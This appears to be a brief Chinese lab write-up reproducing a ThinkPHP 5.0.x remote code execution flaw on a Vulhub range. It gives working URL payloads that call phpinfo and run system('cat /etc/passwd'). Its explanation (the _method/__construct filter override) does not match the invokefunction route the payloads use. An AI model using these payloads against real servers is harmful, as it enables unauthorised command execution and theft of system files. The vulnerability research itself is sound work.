thinkphp5.0.20漏洞复现

本文中涉及到的相关漏洞已报送厂商并得到修复，本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担

漏洞描述：ThinkPHP5.0在核心代码中实现了表单请求类型伪装的功能，该功能利用$_POST['_method']变量来传递真实的请求方法，当攻击者设置$_POST['_method']=__construct时，Request类的method方法便会将该类的变量进行覆盖，攻击者利用该方式将filter变量覆盖为system等函数名，当内部进行参数过滤时便会进行执行任意命令。

影响范围：ThinkPHP 5.0.0 ~ ThinkPHP 5.0.23

环境搭建：
开启Vulhub靶场

访问靶场地址：

漏洞利用：
payload：
查看phpinfo：

http://your-ip:8080/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

查看敏感文件：

http://your-ip:8080/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd

完成！